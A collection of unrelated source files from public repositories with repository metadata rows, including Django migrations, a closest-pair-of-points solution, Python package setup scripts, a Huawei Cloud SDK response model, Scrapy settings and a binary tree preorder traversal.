from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('catalogue', '0015_product_price'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='price',
),
]
| [
"cndeti@gmail.com"
] | cndeti@gmail.com |
7dcae7d80631e98f00eb1837adc3c9fa7474450c | e01c5d1ee81cc4104b248be375e93ae29c4b3572 | /Sequence4/Algorithm-toolbox/Week4/submission/closestpoint-6-2.py | 27df5061138128feac6d7ae6f4c0b8f7ec3a3d67 | [] | no_license | lalitzz/DS | 7de54281a34814601f26ee826c722d123ee8bd99 | 66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1 | refs/heads/master | 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | #Uses python3
import sys
from math import sqrt
def closest_util(Px, Py, ln):
if ln <= 3:
return brute_force(Px, ln)
mid = ln // 2
Qx = Px[:mid]
Rx = Px[mid:]
mid_point = Px[mid][0]
Qy = []
Ry = []
for x in Py:
if x[0] <= mid_point:
Qy.append(x)
else:
Ry.append(x)
mid1 = closest_util(Qx, Qy, mid)
mid2 = closest_util(Rx, Ry, ln - mid)
d = min(mid1, mid2)
strip = []
for i in range(len(Py)):
if abs(Py[i][0] - mid_point) < d:
strip.append(Py[i])
return min(d, strip_closest(strip, len(strip), d))
def brute_force(Px, ln):
mi = float('inf')
for i in range(ln):
for j in range(i+1, ln):
d = dist(Px[i], Px[j])
if d < mi:
mi = d
return mi
def dist(p1, p2):
return sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
def strip_closest(strip, size, delta):
_min = delta
for i in range(size):
for j in range(i+1, min(i + 5, size)):
dst = dist(strip[i], strip[j])
if dst < _min:
_min = dst
return _min
def closest(P, n):
Px = sorted(P, key= lambda d: d[0])
Py = sorted(P, key= lambda d: d[1])
mi = closest_util(Px, Py, n)
return mi
if __name__ == '__main__':
input = sys.stdin.read()
data = list(map(int, input.split()))
n = data[0]
a = []
i = 1
a = list(zip(data[1::2], data[2::2]))
p = closest(a, n)
print("{0:.9f}".format(p)) | [
"lalit.slg007@gmail.com"
] | lalit.slg007@gmail.com |
fb493a7f9431ddc6e4e4707347757a429979cb9f | 6e0001fb880d83d1d3e305e42acba93b85631838 | /Point Diagrams/PD1V1/out1/v_EQEQLTprojectGT.py | 4e6410b1e9e99b3fdac62c13dafc2d7f714accb5 | [] | no_license | pjalagna/Aryc2019 | 97b6de8248006bf19af527e4c1e35763b1277aaa | ece8ccf18305e6c65a59bee650b47b8730904bd0 | refs/heads/master | 2021-06-21T23:14:55.527195 | 2021-03-18T08:02:31 | 2021-03-18T08:02:31 | 205,817,944 | 0 | 1 | null | 2020-10-16T00:13:31 | 2019-09-02T09:03:22 | Python | UTF-8 | Python | false | false | 594 | py |
# file v_EQEQLTprojectGT.py
def main(objj,trace):
local = {} # local architecture ; dies with action
local['ds'] = []
local['nds'] = {}
if(trace == 1):
xx = raw_input("begin v_EQEQLTprojectGT")
retbox = [0,objj,trace] # init by type
# set status to retbox[0] = 0 ok -1 ng or #
retbox[0] = 0 # default is ok
# process work goes here
t = objj['ds'].pop()
if (t == "<project>"):
retbox[0] = 0 # ok
else:
objj['ds'].push(t)
retbox[0] = -1
#endif
return(retbox)
#end v_EQEQLTprojectGT
| [
"PJAlagna@Gmail.com"
] | PJAlagna@Gmail.com |
efe564a24df6338dc3c130002c9e6e40ce2caf64 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/model_control/detailed/transf_Anscombe/model_control_one_enabled_Anscombe_Lag1Trend_Seasonal_DayOfMonth_AR.py | 1f63aee2753363e8e382e17a46c09ec522a83da8 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 160 | py | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Anscombe'] , ['Lag1Trend'] , ['Seasonal_DayOfMonth'] , ['AR'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
24840e6649ffe2f0b8e59a92f4cc0b9bfca31034 | c94f888541c0c430331110818ed7f3d6b27b788a | /shuziwuliu/python/setup.py | e31004b6c7feda1ea8f494f74cff8d9f5bb07c6e | [
"Apache-2.0",
"MIT"
] | permissive | alipay/antchain-openapi-prod-sdk | 48534eb78878bd708a0c05f2fe280ba9c41d09ad | 5269b1f55f1fc19cf0584dc3ceea821d3f8f8632 | refs/heads/master | 2023-09-03T07:12:04.166131 | 2023-09-01T08:56:15 | 2023-09-01T08:56:15 | 275,521,177 | 9 | 10 | MIT | 2021-03-25T02:35:20 | 2020-06-28T06:22:14 | PHP | UTF-8 | Python | false | false | 2,523 | py | # -*- coding: utf-8 -*-
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import os
from setuptools import setup, find_packages
"""
setup module for antchain_shuziwuliu.
Created on 21/03/2023
@author: Ant Chain SDK
"""
PACKAGE = "antchain_sdk_shuziwuliu"
NAME = "antchain_shuziwuliu" or "alibabacloud-package"
DESCRIPTION = "Ant Chain SHUZIWULIU SDK Library for Python"
AUTHOR = "Ant Chain SDK"
AUTHOR_EMAIL = "sdk-team@alibabacloud.com"
URL = "https://github.com/alipay/antchain-openapi-prod-sdk"
VERSION = __import__(PACKAGE).__version__
REQUIRES = [
"antchain_alipay_util>=1.0.1, <2.0.0",
"alibabacloud_tea_util>=0.3.8, <1.0.0",
"alibabacloud_rpc_util>=0.0.4, <1.0.0"
]
LONG_DESCRIPTION = ''
if os.path.exists('./README.md'):
with open("README.md", encoding='utf-8') as fp:
LONG_DESCRIPTION = fp.read()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license="Apache License 2.0",
url=URL,
keywords=["antchain","shuziwuliu"],
packages=find_packages(exclude=["tests*"]),
include_package_data=True,
platforms="any",
install_requires=REQUIRES,
python_requires=">=3.6",
classifiers=(
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
"Topic :: Software Development"
)
)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
dae5b42382e8e74d2b2b579db2cbab17d24e21ff | 12a42054b156383ebbe3ccc5de4150633c66da5d | /problems/longest-consecutive-sequence/solution.py | bd284b649e4f30eb39ed840b85cb0b4ee6dcbb38 | [] | no_license | cfoust/leetcode-problems | 93c33029f74f32c64caf8294292226d199d6e272 | f5ad7866906d0a2cf2250e5972ce910bf35ce526 | refs/heads/master | 2020-03-16T23:05:45.123781 | 2018-05-11T16:41:09 | 2018-05-11T16:41:09 | 133,064,772 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | class Solution:
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
| [
"cfoust@sqweebloid.com"
] | cfoust@sqweebloid.com |
191648db5c4ce872041af42a900a4a429edc158e | 4eb2cac1b030a129a2ba4a156d5d1ccbf2d472bb | /fullcalendar/calendario/migrations/0003_auto_20161110_2030.py | 1f31a5bbe66d999a7be787fe6a483a72a7868238 | [] | no_license | CoutinhoElias/calendario | aba3899b10a31f1b6175c943480b4fe45398cb69 | 0d519f7fee242f8856a1d6cf55b03ba9b1bbbabf | refs/heads/master | 2020-12-22T09:05:20.403642 | 2016-11-11T19:00:00 | 2016-11-11T19:00:00 | 73,497,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-10 20:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('calendario', '0002_auto_20161110_2013'),
]
operations = [
migrations.RemoveField(
model_name='avaluo',
name='avaluo_id',
),
migrations.AddField(
model_name='avaluo',
name='Estatus',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='avaluo',
name='id',
field=models.AutoField(auto_created=True, default=1, primary_key=True, serialize=False, verbose_name='ID'),
preserve_default=False,
),
]
| [
"coutinho.elias@gmail.com"
] | coutinho.elias@gmail.com |
8d160ec784e313aa01c3b5a268ffa2e46ebb06d0 | 6c083d19a4e95a5b61637db8ec042ce4a338b6b0 | /python_mongo_crud/crud/positions.py | 8dbbfd1e0b18310219f42c2d4904b5c21c0830dc | [] | no_license | zeionara/barbershop | a0269e58bbd10a2f969f574f5c4296ba69aa09ca | e4600b7b5483b2692b0fbb6ba0f5b8dbbb839e01 | refs/heads/master | 2021-03-27T10:15:17.820736 | 2017-12-22T15:27:46 | 2017-12-22T15:27:46 | 110,250,691 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | import configparser
from connection import create_session
from ming import schema
from ming.odm import FieldProperty
from ming.odm.declarative import MappedClass
from commons import EnhancingClass
collection_name = 'positions'
config = configparser.ConfigParser()
config.read('C://Users//Zerbs//accounts.sec')
session = create_session(config['mongo']['login'], config['mongo']['password'], config['mongo']['path'])
class Position(MappedClass, EnhancingClass):
class __mongometa__:
session = session
name = collection_name
_id = FieldProperty(schema.ObjectId)
name = FieldProperty(schema.String(required=True))
description = FieldProperty(schema.String(if_missing = ''))
#position = Position(name = "General hairdresser")
session.flush_all()
| [
"zeionara@gmail.com"
] | zeionara@gmail.com |
2330592ed088ee598023957ab4a8652c45eddcc4 | da4c40f8f21b0813c9a935479c56230eddf71dd3 | /simple_rl/ltl-old/experiments/run_experiments.py | cc1af01de47102559286607165c2b55b9ebd459b | [] | no_license | h2r/ltl-amdp | f804bf4ad083dc9d7f0f960af535411b1cbc6f9a | 5aa3a4d6fa060b0e9f151c0efee45eea61c799d7 | refs/heads/master | 2022-07-22T07:52:37.719118 | 2019-08-29T06:16:32 | 2019-08-29T06:16:32 | 187,088,228 | 4 | 1 | null | 2022-06-21T21:59:20 | 2019-05-16T19:21:08 | Python | UTF-8 | Python | false | false | 8,040 | py | import time
import os
from simple_rl.ltl.AMDP.RoomCubePlainMDPClass import RoomCubePlainMDP
from simple_rl.ltl.AMDP.LtlAMDPClass import LTLAMDP
from simple_rl.ltl.settings.build_cube_env_1 import build_cube_env
from simple_rl.planning import ValueIteration
def run_plain_pMDP(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
mdp = RoomCubePlainMDP(init_loc = init_loc, ltl_formula=ltl_formula, env_file=[cube_env],
ap_maps=ap_maps)
value_iter = ValueIteration(mdp, sample_rate=1, max_iterations=50)
value_iter.run_vi()
# Value Iteration
action_seq, state_seq = value_iter.plan(mdp.get_init_state())
computing_time = time.time() - start_time
# Print
if verbose:
print("=====================================================")
print("Plain: Plan for ", ltl_formula)
for i in range(len(action_seq)):
room_number, floor_number = mdp._get_abstract_number(state_seq[i])
print(
"\t {} in room {} on the floor {}, {}".format(state_seq[i], room_number, floor_number, action_seq[i]))
room_number, floor_number = mdp._get_abstract_number(state_seq[-1])
print("\t {} in room {} on the floor {}".format(state_seq[-1], room_number, floor_number))
# success?
if len(state_seq) <= 1:
flag_success = -1
else:
if mdp.automata.aut_spot.state_is_accepting(state_seq[-1].q):
flag_success = 1
else:
flag_success = 0
return computing_time, len(action_seq), flag_success, state_seq, action_seq, value_iter.get_num_backups_in_recent_run()
def run_aMDP(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
ltl_amdp = LTLAMDP(ltl_formula, ap_maps, env_file=[cube_env], slip_prob=0.0, verbose=verbose)
# ltl_amdp.solve_debug()
sseq, aseq, len_actions, backup_num = ltl_amdp.solve(init_loc)
computing_time = time.time() - start_time
# success?
if len_actions == 0:# or len(sseq) == 0:
flag_success = -1
#len_actions = 0
else:
if sseq[-1][-1].q == 1:
flag_success = 1
else:
flag_success = 0
return computing_time, len_actions, flag_success, sseq, aseq, backup_num
def run_aMDP_lowest(init_loc, ltl_formula, cube_env, ap_maps, verbose=False):
start_time = time.time()
ltl_amdp = LTLAMDP(ltl_formula, ap_maps, env_file=[cube_env], slip_prob=0.0, verbose=verbose)
# ltl_amdp.solve_debug()
sseq, aseq, len_actions, backup_num = ltl_amdp.solve(init_loc, FLAG_LOWEST=True)
computing_time = time.time() - start_time
# success?
if len_actions == 0:
flag_success = -1
else:
if sseq[-1][-1].q == 1:
flag_success = 1
else:
flag_success = 0
return computing_time, len_actions, flag_success, sseq, aseq, backup_num
if __name__ == '__main__':
cube_env1 = build_cube_env()
# define scenarios for a large environment
formula_set1 = ['Fa', 'F (a & F b)', 'F(a & F( b & Fc))', '~a U b', 'F (a & F b)','F(a & F( b & Fc))']
ap_maps_set1 = {}
ap_maps_set1[0] = {'a': [2, 'state', 3]}
ap_maps_set1[1] = {'a': [0, 'state', (2,4,1)], 'b': [1,'state', 7]}
ap_maps_set1[2] = {'a': [1, 'state', 9], 'b': [2, 'state', 3], 'c': [1, 'state', 17]}
ap_maps_set1[3] = {'a': [1, 'state', 2], 'b': [2, 'state', 3]}
ap_maps_set1[4] = {'a': [1, 'state', 9], 'b': [1, 'state', 17]}
ap_maps_set1[5] = {'c': [0, 'state', (1, 4, 3)], 'a': [2, 'state', 1], 'b': [2, 'state', 2]}
# define scenarios for a large environment
formula_set2 = ['Fa', 'Fa', 'F (a & F b)', '~a U b', 'F(a & F( b & F c))']
ap_maps_set2 = {}
ap_maps_set2[0] = {'a': [1, 'state', 8]}
ap_maps_set2[1] = {'a': [2, 'state', 6]}
ap_maps_set2[2] = {'a': [2, 'state', 4], 'b': [1, 'state', 6]}
ap_maps_set2[3] = {'a': [1, 'state', 11], 'b': [1, 'state', 12]}
ap_maps_set2[4] = {'a': [1, 'state', 5], 'b': [2, 'state', 3], 'c': [0, 'state', (11, 11, 3)]}
formula_set3 = ['Fa', '~a U b', 'F((a | b) & F c)', 'F (a & F b)']
ap_maps_set3 = {}
ap_maps_set3[0] = {'a': [2, 'state', 3]}
ap_maps_set3[1] = {'a': [1, 'state', 2], 'b': [2, 'state', 3]}
ap_maps_set3[2] = {'a': [2, 'state', 2], 'b': [1, 'state', 2], 'c': [2, 'state', 1]}
ap_maps_set3[3] = {'a': [2, 'state', 2], 'b': [1, 'state', 8]}
# simulation settings
run_num = 1.0 #the number of run
flag_verbose = False # Show result paths
flag_save = False
num_env = 1 #environment name : build_cube_env(num_env).py 3: for examples
init_loc = (1,1,1)
# select the world (1: small, 2: large cube world)
formula_set = eval("formula_set{}".format(num_env))
ap_maps_set = eval("ap_maps_set{}".format(num_env))
for num_case in [5]:
print("+++++++++++++++++ Case: {} +++++++++++++++++++".format(num_case))
if flag_save:
file = open("{}/results/result_time.txt".format(os.getcwd()), "a")
ltl_formula = formula_set[num_case]
ap_maps = ap_maps_set[num_case]
#initialize
run_time_plain = 0.0
run_time_amdp = 0.0
run_time_amdp_lowest = 0.0
run_len_plain = 0.0
run_len_amdp = 0.0
run_len_amdp_lowest = 0.0
for i in range(int(run_num)):
print("* Trial {}".format(i))
# Experiment: AMDP
print("[Trial {}] AP-MDP ----------------------------------------".format(i))
t, l, _, _,_, backup= run_aMDP(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_amdp = run_time_amdp + t
run_len_amdp = run_len_amdp + l
print(" [AP-MDP] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
# Experiment: decomposed LTL and solve it at the lowest level
print("[Trial {}] AP-MDP at level 0 ----------------------------------------".format(i))
t, l, _, _,_, backup = run_aMDP_lowest(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_amdp_lowest = run_time_amdp_lowest + t
run_len_amdp_lowest = run_len_amdp_lowest + l
print(" [AP-MDP at level 0] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
# Experiment: Plain MDP
print("[Trial {}] Plain ----------------------------------------".format(i))
t, l, _, _,_, backup = run_plain_pMDP(init_loc, ltl_formula, cube_env1, ap_maps, verbose=flag_verbose)
run_time_plain = run_time_plain + t
run_len_plain = run_len_plain + l
print(" [Plain] Time: {} seconds, the number of actions: {}, backup: {}"
.format(round(t, 3), l, backup))
print("* Summary: " + ltl_formula)
print(" AP-MDP: {}s, {}".format(round(run_time_amdp / run_num, 3), run_len_amdp / run_num))
print(" AP-MDP at level 0: {}s, {}".format(round(run_time_amdp_lowest / run_num, 3), run_len_amdp_lowest / run_num))
print(" Product-MDP: {}s, {}".format(round(run_time_plain / run_num, 3), run_len_plain / run_num))
if flag_save:
file.write("=== Env {} ==============================================\n".format(num_env))
file.write("Run {} times\n".format(run_num))
file.write("Task:\t"+ltl_formula+"\n")
file.write("AP:\t{}\n".format(ap_maps))
file.write("AP-MDP:\t{}s, {}\n".format(round(run_time_amdp / run_num, 3), run_len_amdp / run_num))
file.write("AP-MDP at level 0:\t{}s, {}\n".format(round(run_time_amdp_lowest / run_num, 3),
run_len_amdp_lowest / run_num))
file.write("Product-MDP:\t{}s, {}\n".format(round(run_time_plain / run_num, 3), run_len_plain / run_num))
file.close()
| [
"romapatel996@gmail.com"
] | romapatel996@gmail.com |
e5a1dedc7088d5109287a64cf316c8912507a8f1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-dataartsstudio/huaweicloudsdkdataartsstudio/v1/model/show_apps_overview_response.py | 71c0824500634e0b099b139b6237cc2e18cf49b0 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 7,518 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowAppsOverviewResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'apply_num': 'int',
'call_num': 'int',
'success_num': 'int',
'fail_num': 'int',
'legal_num': 'int',
'illegal_num': 'int'
}
attribute_map = {
'apply_num': 'apply_num',
'call_num': 'call_num',
'success_num': 'success_num',
'fail_num': 'fail_num',
'legal_num': 'legal_num',
'illegal_num': 'illegal_num'
}
def __init__(self, apply_num=None, call_num=None, success_num=None, fail_num=None, legal_num=None, illegal_num=None):
"""ShowAppsOverviewResponse
The model defined in huaweicloud sdk
:param apply_num: 申请量
:type apply_num: int
:param call_num: 调用总量
:type call_num: int
:param success_num: 成功调用量(取数成功)
:type success_num: int
:param fail_num: 失败调用量(取数失败)
:type fail_num: int
:param legal_num: 合法调用量(通过校验)
:type legal_num: int
:param illegal_num: 非法调用量(无法通过校验)
:type illegal_num: int
"""
super(ShowAppsOverviewResponse, self).__init__()
self._apply_num = None
self._call_num = None
self._success_num = None
self._fail_num = None
self._legal_num = None
self._illegal_num = None
self.discriminator = None
if apply_num is not None:
self.apply_num = apply_num
if call_num is not None:
self.call_num = call_num
if success_num is not None:
self.success_num = success_num
if fail_num is not None:
self.fail_num = fail_num
if legal_num is not None:
self.legal_num = legal_num
if illegal_num is not None:
self.illegal_num = illegal_num
@property
def apply_num(self):
"""Gets the apply_num of this ShowAppsOverviewResponse.
申请量
:return: The apply_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._apply_num
@apply_num.setter
def apply_num(self, apply_num):
"""Sets the apply_num of this ShowAppsOverviewResponse.
申请量
:param apply_num: The apply_num of this ShowAppsOverviewResponse.
:type apply_num: int
"""
self._apply_num = apply_num
@property
def call_num(self):
"""Gets the call_num of this ShowAppsOverviewResponse.
调用总量
:return: The call_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._call_num
@call_num.setter
def call_num(self, call_num):
"""Sets the call_num of this ShowAppsOverviewResponse.
调用总量
:param call_num: The call_num of this ShowAppsOverviewResponse.
:type call_num: int
"""
self._call_num = call_num
@property
def success_num(self):
"""Gets the success_num of this ShowAppsOverviewResponse.
成功调用量(取数成功)
:return: The success_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._success_num
@success_num.setter
def success_num(self, success_num):
"""Sets the success_num of this ShowAppsOverviewResponse.
成功调用量(取数成功)
:param success_num: The success_num of this ShowAppsOverviewResponse.
:type success_num: int
"""
self._success_num = success_num
@property
def fail_num(self):
"""Gets the fail_num of this ShowAppsOverviewResponse.
失败调用量(取数失败)
:return: The fail_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._fail_num
@fail_num.setter
def fail_num(self, fail_num):
"""Sets the fail_num of this ShowAppsOverviewResponse.
失败调用量(取数失败)
:param fail_num: The fail_num of this ShowAppsOverviewResponse.
:type fail_num: int
"""
self._fail_num = fail_num
@property
def legal_num(self):
"""Gets the legal_num of this ShowAppsOverviewResponse.
合法调用量(通过校验)
:return: The legal_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._legal_num
@legal_num.setter
def legal_num(self, legal_num):
"""Sets the legal_num of this ShowAppsOverviewResponse.
合法调用量(通过校验)
:param legal_num: The legal_num of this ShowAppsOverviewResponse.
:type legal_num: int
"""
self._legal_num = legal_num
@property
def illegal_num(self):
"""Gets the illegal_num of this ShowAppsOverviewResponse.
非法调用量(无法通过校验)
:return: The illegal_num of this ShowAppsOverviewResponse.
:rtype: int
"""
return self._illegal_num
@illegal_num.setter
def illegal_num(self, illegal_num):
"""Sets the illegal_num of this ShowAppsOverviewResponse.
非法调用量(无法通过校验)
:param illegal_num: The illegal_num of this ShowAppsOverviewResponse.
:type illegal_num: int
"""
self._illegal_num = illegal_num
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowAppsOverviewResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
0069f78905351db695975fbd72ebc1b5ae332d60 | 9b9b6a7aa1de1092a8480771f2b08ffa0972218d | /python/sklearn/linear-regression/workload-analysis/classify/online/params/param_counter.py | 1af00ac73271adc2c5101bc6c3e24af7064e2cb7 | [
"WTFPL"
] | permissive | lijiansong/lang | c42ca757306b38f37a26fef841b2460f05a13af6 | 27ffecd9afe67ddac003fc4d6333e06e2cc20434 | refs/heads/master | 2023-02-25T17:36:01.221720 | 2023-02-14T14:10:29 | 2023-02-14T14:10:29 | 149,586,739 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | import caffe
from numpy import prod, sum
from pprint import pprint
import os
def print_param_info(net_name, net_file):
net = caffe.Net(net_file, caffe.TEST)
print('Layer-wise params:')
pprint([(k, v[0].data.shape) for k, v in net.params.items()])
print('--> {} total number of params: {}'.format(net_name, sum([prod(v[0].data.shape) for k, v in net.params.items()])/1024.0/1024.0))
if __name__ == '__main__':
net_list = ['mobilenet_v2-github', 'mobilenet', 'squeezenet', 'densenet121', 'resnet50', 'ssd_mobilenetv1', 'ssd_vgg16']
for net in net_list:
net_file_blob = net + '/' + net + '_float16_dense_1batch.prototxt'
if not os.path.exists(net_file_blob):
print('{} NOT exists!!!'.format(net_file_blob))
exit(-1)
print_param_info(net, net_file_blob)
| [
"lijiansong@ict.ac.cn"
] | lijiansong@ict.ac.cn |
28691a0f6566ba2f43a980db581c0b15aacf756e | 34e44059f187d9064959842ef8b6a8526e0db431 | /pariba/settings.py | 25791709cfaaa0939a65be86a085476062311b53 | [] | no_license | SimeonYS/pariba | f682285d3a370468b2612fb02af3e2ef7b51be51 | af662fb20d5f33d45915062180f4481fa014d18a | refs/heads/main | 2023-03-07T07:26:18.513902 | 2021-02-26T11:39:15 | 2021-02-26T11:39:15 | 342,557,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | BOT_NAME = 'pariba'
SPIDER_MODULES = ['pariba.spiders']
NEWSPIDER_MODULE = 'pariba.spiders'
FEED_EXPORT_ENCODING = 'utf-8'
LOG_LEVEL = 'ERROR'
DOWNLOAD_DELAY = 0
USER_AGENT="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
ROBOTSTXT_OBEY = True
ITEM_PIPELINES = {
'pariba.pipelines.ParibaPipeline': 300,
} | [
"simeon.simeonov@ADPVT.com"
] | simeon.simeonov@ADPVT.com |
21da94d8fe23dc14ad9e002afb37fa79fa9265db | 808eb8f2ae19d78531d2179d28aa1bc569b87a7d | /setup.py | 79722097e9aa60945975738c3bbfa496e741002f | [
"BSD-3-Clause"
] | permissive | huangjundashuaige/elastic | b59f5143fbc28291500e441bba824d532947ffc7 | 9e0b6abc87a5cb6c0ece2d630d3bdb812682ba45 | refs/heads/master | 2022-12-07T05:26:40.370489 | 2020-09-04T05:30:51 | 2020-09-04T05:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,241 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import re
import sys
from setuptools import find_packages, setup
def get_version():
# get version string from version.py
# TODO: ideally the version.py should be generated when setup is run
version_file = os.path.join(os.path.dirname(__file__), "torchelastic/version.py")
version_regex = r"__version__ = ['\"]([^'\"]*)['\"]"
with open(version_file, "r") as f:
version = re.search(version_regex, f.read(), re.M).group(1)
return version
if __name__ == "__main__":
if sys.version_info < (3, 8):
sys.exit("python >= 3.8 required for torchelastic")
with open("README.md", encoding="utf8") as f:
readme = f.read()
with open("requirements.txt") as f:
reqs = f.read()
version = get_version()
print("-- Building version: " + version)
setup(
# Metadata
name="torchelastic",
version=version,
author="PyTorch Elastic Devs",
author_email="torchelastic@fb.com",
description="PyTorch Elastic Training",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/pytorch/elastic",
license="BSD-3",
keywords=["pytorch", "machine learning", "elastic", "distributed"],
python_requires=">=3.6",
install_requires=reqs.strip().split("\n"),
include_package_data=True,
packages=find_packages(exclude=("test", "test.*")),
test_suite="test.suites.unittests",
# PyPI package information.
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Topic :: System :: Distributed Computing",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
0631bc7566c1dfbeee8db0e84fcf39ae79453c92 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Medium/144. Binary Tree Preorder Traversal/Binary Tree Preorder Traversal.py | caf9c234794d2dbc9002cb5f15b5547ac17fe488 | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | #!/usr/bin/env python
# encoding: utf-8
"""
@author: Wayne
@contact: wangye.hope@gmail.com
@software: PyCharm
@file: Binary Tree Preorder Traversal
@time: 2019/8/22 17:55
"""
import sys
sys.path.append('..')
from Tools.BinaryTree import *
class Solution:
def preorderTraversal(self, root: TreeNode) -> list:
ret = []
if not root: return ret
stack = [root]
while stack:
s = stack.pop()
ret.append(s.val)
if s.right:
stack.append(s.right)
if s.left:
stack.append(s.left)
return ret
so = Solution()
tree = parseTreeNode([1, 2, 3, 4, 5, 6, 7])
print(so.preorderTraversal(tree))
| [
"905317742@qq.com"
